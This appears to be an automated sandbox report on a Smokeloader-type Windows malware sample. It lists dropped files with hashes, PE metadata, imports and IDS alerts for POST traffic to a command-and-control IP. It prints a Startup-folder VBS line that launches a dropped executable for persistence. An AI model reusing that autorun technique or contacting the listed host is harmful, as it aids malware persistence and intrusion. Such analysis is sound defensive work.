                                                                                                                                                                                Preview:....L...! .z..l..0......d;*....I.2.H..n.1.P.....AW.....aZ.(p..d..%...c..2.h0.....P~..T(..HBk.:3.u....uxW."....-xSP.C.BNY...{.I...m.I!=+.@o.g.y....y.....c..rtf1.?>.`jb.b..#..M._.........%......m..=^L..P.D5B....KB...Wn.*..5m.R...T...\.)...._.z.k.r8&..Q.k............d2O.Ax.....05..w..t0...E.8.}..O.2.?L..j5 '....8 n.0E..B..8..=._..b..w.$.F...f.v.G...a+.%./....S..-...h\..l..3.........Rv.u......0,s~z.2'..{..:...*b6........+..5....w~.1....#.[....e..........vy.*..........<...j..q.YFh....Y6.....U...>..ZJx........f...2.....9e.t @.x"..#.6..m=..Q....7II....vz{d.J....u.G.....0...f..y/8.. ...S.Q..0.k.MHc..q.e..i...%.(W.k....y..C0..%A.:N..j.{~.`.h.Ze.Y.f#:. ....`.}SF...M..$/..s.......E....e.s..o.l.u......'....}4..........[{...1.A...2K.7Q4!.lE....D.v!u......{.5...V./....._8W8d<....lU.I.e...+G.O.8..B......!.~.........r@...8N...x.&....7t].V........z[...`..........V.&....G..D.z*.E.......~P=v:..^..........I..t.d.O.Y/.W.}...ci..!..<..#.*eu..U.pR.

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Showtimes

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A723.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):528384
                                                                                                                                                                                Entropy (8bit):7.999686800936222
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:12288:/ek7iUS7wezxKsRXsevPKqjqw59oDRchDC/5nWYqIeV:/ek7Qzx5Hvdqkyld6
                                                                                                                                                                                MD5:D80C7B36C3C560027E6ED338CA5511AD
                                                                                                                                                                                SHA1:E6269EC9C13FE30E25C753F2C35C61471473E96C
                                                                                                                                                                                SHA-256:93B1DB8109280FF4567343944C02FEE3924233D36EB52854B3C43B46F3B4DEEC
                                                                                                                                                                                SHA-512:1F9912FA5776DC5B7286EDC0304B91586A88BA3AA6AB62B7F7B061C54EE301A272E32CAB865FB4A309DCC45E594B584EF46355530993E744BEDE6C01E3479ACE
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:F.....9....v..z..~..Mi.....3.|...i....F. .=#...:..Cu0B....f.e..5.Fg..(..Y..]#..=*.9.b...p.b.p.~....g..^.e\N...g...b.q.....<..7.....v34.G?...W. .p...~.PA].H.O......g....._...h...,......=.*.]<..Hb.\.....A........l...?..n..qn..U.....~7i./),N.#....t..yAi[...w.....O..O.4.s...n.W.Pi..........I...T.+?s~.......J...V.../......X.?J/O.^........5...e.....&...Z...].2.....<...9.G).=.0g........ZCv.L}..."...D....D..O..."?.+..`.......Q!.].....t'a.<.&..7...VL,..#..u.6ON@.....w.p|.r.e.CDg.8.U...7."..w....y.@lw....G........yb.....}../.Ow.^imo.)V.n!.....\.....c..b.'..D..~..w..s........5.L5N......yq....@.O_.1.....&.....x>....Xn.JcH-BC.J.T....../../........#!...RO#...l....)c'.V.1F@2_...4...[....\NQ..r.C..../..}.i....,....:.[..A..^!..zx.....df...F.;.<n..4.l.7I3.1..T.._...(....2.t.s:k.T.........N\r..M.._ex_..j$.r[.....of.(;......Q.b...@D...".j..._.R=......!./..+=.;.>........t.) ......,%[0l...-....Z...v;......E.8.N........2$bdM.[le........y..z#..z....,HH....1.h.;..6f

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Sucking

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A723.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):785408
                                                                                                                                                                                Entropy (8bit):7.99979584006876
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:12288:sPwxw/+tv48SsOX0STLXZCV9u3G3EQ1iX3o7VYbNWsOUYKhlTivYtvXp19c04L07:9xLRNZO5cW3Gn1iHoeb4IpsYtvX79B4U
                                                                                                                                                                                MD5:A9EFB8DF13C3193CBFED44E9C05FBBCA
                                                                                                                                                                                SHA1:2D61626A5C781E90D1D1B72CBA9CF0BF0339CC92
                                                                                                                                                                                SHA-256:2566D27F50CF6BF6E495485788C88C973754478BA4C7B57241F4EFDFF96A85DE
                                                                                                                                                                                SHA-512:BA5B0DF1559EF195A14812633F0B8A7FD84910DC07F09167D28F05F786CDD79CC5F6265C4BCB7856DC299322A70B3D731E30423B779EA135616587615EE5A4DE
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:~...m..)....q... .v.U_.].g.|m.c.U.O.W.5,..v.../.......fV$..M^.t F .........WA.V..v...-e..0W;;=.mnZ.......|.".$.......*..$X...K....).o.R....2-.A...Y...6..gf.0j...G...I!.W0.........U......0Zl{..7...t.v....KP..F...$a.3.5Z...+...l....-.......c..YB...}`.b]F....B...4..W6.$.../.%...}XT)l...=..0..^[I.7:..M.7L..$....M.x.%..B:?A.....S...6.;.] ..i....G!F..#6kT..n$..".=........1...@:U..d..zM.... ..0O.G.9.DrZ.R.j....<..'.+''rY..Z"&.}.7e..Ld..M..+...~.6.....MWT....n.|5NQ....p..)...l...EX.F......N....&.....Z...rR......6/...%....:..).PW.}.......-W.%;../.Y...."..T...f7d@...c.)..i...jS.p......Op.=.B..j...6..V......9..X.......~....3.G...l.\O.}....V....V.cBY?...c7b#..Q.W..Q..yrnW...pK..Y.~..f..{...=E.X.../)..hON..-U...c...${.'^...$.0B.P.~+........U...:.!..j3^..?...m...zc.-......PT...1..{.@..a...H.r!..9...x..h......b..T..b..8.R.z..B4.K.......V.....@\6......_.[.4Pm...bDv5fu..b.m.;2...".%./C!...G76k>.x5P.IL.m\.k.r?{\..Z"..$b\..xR.RR.....*$........H-..",

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Threesome

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A723.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):943104
                                                                                                                                                                                Entropy (8bit):7.999801314457115
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:24576:u6DJM65JhXhNFNJbrWydxgN2aYQ8MsNxq:375hTN5ayDrrMsNw
                                                                                                                                                                                MD5:D93924A61A19A84A3180D0733E5C366D
                                                                                                                                                                                SHA1:6C0FE4A1A9245FE1D70ACDE743DC9E2C561143D3
                                                                                                                                                                                SHA-256:A926FE771A3657EEC12A2687C837187FB2E043BB6C87934CDF89D01224A7A3AB
                                                                                                                                                                                SHA-512:310FBED862D44F0111BF8673020DDEF04D86D9B1D63BC14EAA3190DBB01148106A1AA1E730A0411D75D7E99BA7B754B8575D85FB8BB8C436D370BCF0DC0E7232
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:...@.%v:{*.u.xy.>..].....(HDj...y-.@......._......|w.o.....v..t,(.b[B.0X(......l......#<}[]3t<.."...B...\.@....{8....=..F...+&.- Jea...7..j.....w..7..G!=-..../yH............F...0&........B.r..6"..].....QEn[.#.F.Q4R.....iD.94.l.(.s.k....S-...L+D.......YSavF..'.D....v....~...Br.#..E....s...F=R.g...t.J7...K.,4...../.s.6......b..0O..Q!v.W....... .z:.%.. Ve.....@.........u.=E....n..;s.........d..YM....d.yT. ...Z..+.T|Z.u.*?.'! f6.'T.6.......?..".X ..:-..S.......K.<..%]...W..|....}|B...5..3.s.V......V=6...ePIb..q...aU)..F.e..[ruR.w}.....O&.....1.=....>..P.0w.g.=._..r6M....Tc...h.i1.v..N...\..>.o.^..Rv..4Z....m8.....{...o6J.m..:..J....{....#.iG..MO...b..."<.W.<.X...F.r..F.n?...H.u.wU.....i..*~..[...a.i.!T%....&...f..r..vU..i...-+..[>~j...1O...9d.j-.........Y.h1..kIp..`[...Z.,..d[.9......8...^-9.G........+..V._h?..:..8T.....CP.....>Q..8.{.JGb2.[..?&.m.}R.".7b(.r....w8.B=...h..(............OD..Kp.5...aR*..3..&....O..Eb....}.S....k...;...S.....q`....

                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Result.vbs

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\3E6C.exe
                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):81
                                                                                                                                                                                Entropy (8bit):4.682097768627399
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:FER/n0eFHHot+kiEaKC5wXfkAHnn:FER/lFHIwknaZ5wXfJH
                                                                                                                                                                                MD5:08D9686EF22D66E5326B1F11A49EB914
                                                                                                                                                                                SHA1:70C95451965319E085C99D9A9FB23B7F3051A3DD
                                                                                                                                                                                SHA-256:453F4A3D8B52DAFCEDE809B33F6E0DD29C6215ECCCAFE3ED12EC74A96451604B
                                                                                                                                                                                SHA-512:83157F8D4CF78F804AD4D7CE93FDC396F398825E97D53DE82FCF058EF01DCFCB30DE116A895B18E72F71ED60EA58061CE70F0A50EBEF6B53CDF2744D9F42028A
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Result.exe"""

                                                                                                                                                                                C:\Users\user\AppData\Roaming\Result.exe

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\3E6C.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                Category:modified
                                                                                                                                                                                Size (bytes):1401856
                                                                                                                                                                                Entropy (8bit):5.46718710825262
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24576:UUK9HMrB8lbfCe4kp6HeFSCX3NXb4mLibM9HU6UkALbnVQ3E2qZjt:UUKk8jp68oLbnVQ3E2
                                                                                                                                                                                MD5:22059CF3BA4B5338116E054D63DBCB46
                                                                                                                                                                                SHA1:875B2DA18119A55395C4611DEDF31B34420B6111
                                                                                                                                                                                SHA-256:C8D9334DAFBBA9DB79280A2567D9D2EDE04E27255C528DFF3C13E589F34E7125
                                                                                                                                                                                SHA-512:4648684573901D71EEC1BE491AB5700E6AA6A2C0ED5DCFD734D071F65D78BAB203377683A1E1B48976D1E481E42623B64945163A7D33648BF5C9233390514417
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...q.ng.................Z...........y... ........@.. ....................................`..................................y..K.................................................................................... ............... ..H............text....Y... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B.................y......H........|...............................................................*...(....*..0.......... ........8........E....@...?.......0...8;...~....%:F...& ....~&...{....:....& ....8....(.... ....8....*~..........s....%.....s....(.... ....~&...{....:w...& ....8l.....&~.......*...~....*..s.........*..(....*.0..S....... ........8........E....3.......8....(.........(.... ....~&...{....:....& ....8....*.&~.......*...~....*..0..W....... ........8........E....7.......82....r...po.....

                                                                                                                                                                                C:\Users\user\AppData\Roaming\jagvise

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):231424
                                                                                                                                                                                Entropy (8bit):5.546586905728256
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:zKEbzkIj9XmBQXzBOY+UhcaPKzyU5NRS8/AZdF+:mEPkIjRmGNOMYz3H
                                                                                                                                                                                MD5:2A270773553CFDCA5C1FDBF24D44F18C
                                                                                                                                                                                SHA1:BA5A6399C539F549B519F084C54852B6D434B030
                                                                                                                                                                                SHA-256:3FFB13F7F47722571DC7271EBBB09C2B893D4EFE9A515F19FCCC5E75CFA93220
                                                                                                                                                                                SHA-512:DCB83C9E6325C5944E4EEFE865AD95B4560F3E4557C18C9FB7B0EF2D1ABFEC3BAC6BFF416EFDF3E042E0DCC4302263F57EA1AADE22F912EE5D2F0A6A9C223C40
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......).`.mq..mq..mq...>..oq..s#..sq..s#..yq..s#...q..J.u.jq..mq...q..s#..lq..s#..lq..s#..lq..Richmq..................PE..L......e......................?.............. ....@.......................... A......N......................................L8..P....0@.............................................................................. ...............................text............................... ..`.rdata...!... ..."..................@..@.data.....=..P...p...0..............@....rsrc........0@.....................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Roaming\jagvise:Zone.Identifier

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):26
                                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                Static File Info

                                                                                                                                                                                General

                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Entropy (8bit):5.546586905728256
                                                                                                                                                                                TrID:
                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                File name:hoEtvOOrYH.exe
                                                                                                                                                                                File size:231'424 bytes
                                                                                                                                                                                MD5:2a270773553cfdca5c1fdbf24d44f18c
                                                                                                                                                                                SHA1:ba5a6399c539f549b519f084c54852b6d434b030
                                                                                                                                                                                SHA256:3ffb13f7f47722571dc7271ebbb09c2b893d4efe9a515f19fccc5e75cfa93220
                                                                                                                                                                                SHA512:dcb83c9e6325c5944e4eefe865ad95b4560f3e4557c18c9fb7b0ef2d1abfec3bac6bff416efdf3e042e0dcc4302263f57ea1aade22f912ee5d2f0a6a9c223c40
                                                                                                                                                                                SSDEEP:3072:zKEbzkIj9XmBQXzBOY+UhcaPKzyU5NRS8/AZdF+:mEPkIjRmGNOMYz3H
                                                                                                                                                                                TLSH:32345A1035F19026EFFB4BB715B4D6941A3BBF6F6B70808E22503ADE1E336904A547A3
                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......).`.mq..mq..mq...>..oq..s#..sq..s#..yq..s#...q..J.u.jq..mq...q..s#..lq..s#..lq..s#..lq..Richmq..................PE..L......e...

                                                                                                                                                                                File Icon

                                                                                                                                                                                Icon Hash:8f97312d2925191a

                                                                                                                                                                                Static PE Info

                                                                                                                                                                                General

                                                                                                                                                                                Entrypoint:0x4016ae
                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                Time Stamp:0x651DB097 [Wed Oct 4 18:36:07 2023 UTC]
                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                Import Hash:aeda2247107ce1cc9c58b0f6c2e9c5f9

                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                Instruction
                                                                                                                                                                                call 00007FDCE8C78E14h
                                                                                                                                                                                jmp 00007FDCE8C7541Dh
                                                                                                                                                                                mov edi, edi
                                                                                                                                                                                push ebp
                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                sub esp, 00000328h
                                                                                                                                                                                mov dword ptr [00427C18h], eax
                                                                                                                                                                                mov dword ptr [00427C14h], ecx
                                                                                                                                                                                mov dword ptr [00427C10h], edx
                                                                                                                                                                                mov dword ptr [00427C0Ch], ebx
                                                                                                                                                                                mov dword ptr [00427C08h], esi
                                                                                                                                                                                mov dword ptr [00427C04h], edi
                                                                                                                                                                                mov word ptr [00427C30h], ss
                                                                                                                                                                                mov word ptr [00427C24h], cs
                                                                                                                                                                                mov word ptr [00427C00h], ds
                                                                                                                                                                                mov word ptr [00427BFCh], es
                                                                                                                                                                                mov word ptr [00427BF8h], fs
                                                                                                                                                                                mov word ptr [00427BF4h], gs
                                                                                                                                                                                pushfd
                                                                                                                                                                                pop dword ptr [00427C28h]
                                                                                                                                                                                mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                mov dword ptr [00427C1Ch], eax
                                                                                                                                                                                mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                mov dword ptr [00427C20h], eax
                                                                                                                                                                                lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                mov dword ptr [00427C2Ch], eax
                                                                                                                                                                                mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                                                mov dword ptr [00427B68h], 00010001h
                                                                                                                                                                                mov eax, dword ptr [00427C20h]
                                                                                                                                                                                mov dword ptr [00427B1Ch], eax
                                                                                                                                                                                mov dword ptr [00427B10h], C0000409h
                                                                                                                                                                                mov dword ptr [00427B14h], 00000001h
                                                                                                                                                                                mov eax, dword ptr [00425004h]
                                                                                                                                                                                mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                                mov eax, dword ptr [00425008h]
                                                                                                                                                                                mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                                call dword ptr [000000C4h]

                                                                                                                                                                                Rich Headers

                                                                                                                                                                                Programming Language:
                                                                                                                                                                                • [C++] VS2008 build 21022
                                                                                                                                                                                • [ASM] VS2008 build 21022
                                                                                                                                                                                • [ C ] VS2008 build 21022
                                                                                                                                                                                • [IMP] VS2005 build 50727
                                                                                                                                                                                • [RES] VS2008 build 21022
                                                                                                                                                                                • [LNK] VS2008 build 21022

                                                                                                                                                                                Data Directories

                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2384c0x50.rdata
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x4030000xe718.rsrc
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x220000x19c.rdata
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                Sections

                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                .text0x10000x2099c0x20a00a9f147a0cc53da379fb6488a7ee14d3fFalse0.6210787835249042data6.432343348190455IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .rdata0x220000x21920x2200ce8b9b7521e65f96e2517cc5eb98aee8False0.36282169117647056data5.5307909725041045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .data0x250000x3dd1180x70003dc08a2c184d6c78a1d85fa02fbc5750unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                .rsrc0x4030000xe7180xe8005b41f0fc42a65581d8dfdbf88c9cfcc5False0.40417901400862066data4.525115163720231IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                Resources

                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                RT_CURSOR0x409e180x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                                                                                                                                                                RT_CURSOR0x409f600x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                                                                                                                                RT_CURSOR0x40a0900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                                                                                                                                RT_ICON0x4035e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.5557036247334755
                                                                                                                                                                                RT_ICON0x4044880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.6137184115523465
                                                                                                                                                                                RT_ICON0x404d300x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.6486175115207373
                                                                                                                                                                                RT_ICON0x4053f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.6654624277456648
                                                                                                                                                                                RT_ICON0x4059600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.4392116182572614
                                                                                                                                                                                RT_ICON0x407f080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.5133677298311444
                                                                                                                                                                                RT_ICON0x408fb00x988Device independent bitmap graphic, 24 x 48 x 32, image size 23040.5184426229508197
                                                                                                                                                                                RT_ICON0x4099380x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.6152482269503546
                                                                                                                                                                                RT_STRING0x40c8180x454data0.45126353790613716
                                                                                                                                                                                RT_STRING0x40cc700x126data0.5238095238095238
                                                                                                                                                                                RT_STRING0x40cd980x656data0.436498150431566
                                                                                                                                                                                RT_STRING0x40d3f00x750data0.4305555555555556
                                                                                                                                                                                RT_STRING0x40db400x6a4data0.4376470588235294
                                                                                                                                                                                RT_STRING0x40e1e80x74cdata0.4229122055674518
                                                                                                                                                                                RT_STRING0x40e9380x70edata0.4330011074197121
                                                                                                                                                                                RT_STRING0x40f0480x84edata0.4195672624647225
                                                                                                                                                                                RT_STRING0x40f8980x662data0.43512851897184823
                                                                                                                                                                                RT_STRING0x40ff000x964data0.4068219633943428
                                                                                                                                                                                RT_STRING0x4108680x66edata0.4356014580801944
                                                                                                                                                                                RT_STRING0x410ed80x60adata0.444372574385511
                                                                                                                                                                                RT_STRING0x4114e80x22adata0.47653429602888087
                                                                                                                                                                                RT_GROUP_CURSOR0x409f480x14data1.15
                                                                                                                                                                                RT_GROUP_CURSOR0x40c6380x22data1.088235294117647
                                                                                                                                                                                RT_GROUP_ICON0x409da00x76data0.6610169491525424
                                                                                                                                                                                RT_VERSION0x40c6600x1b8COM executable for DOS0.575

                                                                                                                                                                                Imports

                                                                                                                                                                                DLLImport
                                                                                                                                                                                KERNEL32.dllSetDefaultCommConfigA, SetLocaleInfoA, DeleteVolumeMountPointA, InterlockedDecrement, GetEnvironmentStringsW, GetComputerNameW, GetModuleHandleW, GetDateFormatA, LoadLibraryW, ReadProcessMemory, GetTimeFormatW, GetConsoleAliasW, CreateProcessA, GetAtomNameW, GetStartupInfoW, GetShortPathNameA, SetLastError, GetProcAddress, PulseEvent, SetFileAttributesA, BuildCommDCBW, GetNumaHighestNodeNumber, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, LocalAlloc, AddAtomA, FoldStringW, OpenFileMappingW, RequestWakeupLatency, WriteConsoleOutputAttribute, FindFirstVolumeA, FindAtomW, UnregisterWaitEx, CreateFileA, WriteConsoleW, SearchPathA, GetCommandLineW, MultiByteToWideChar, GetLastError, HeapReAlloc, HeapAlloc, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapCreate, VirtualFree, HeapFree, VirtualAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, InitializeCriticalSectionAndSpinCount, RtlUnwind, HeapSize, ReadFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP, GetModuleHandleA
                                                                                                                                                                                USER32.dllGetClassLongW
                                                                                                                                                                                GDI32.dllGetBitmapBits

                                                                                                                                                                                Network Behavior

                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                2024-12-30T19:42:23.662544+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44973658.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:42:25.118879+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44973758.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:42:26.599116+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44973858.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:42:28.066270+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44973958.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:42:29.526498+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974058.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:42:31.023710+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974158.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:42:32.476347+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974258.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:42:33.955334+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974358.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:42:35.391274+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974458.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:42:36.871674+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974558.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:42:38.356537+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974658.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:42:40.059112+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974758.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:42:41.554692+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974858.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:42:43.007851+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974958.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:42:44.454560+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975058.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:42:45.942343+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975158.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:42:47.461369+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975258.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:42:48.939673+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975358.151.148.9080TCP
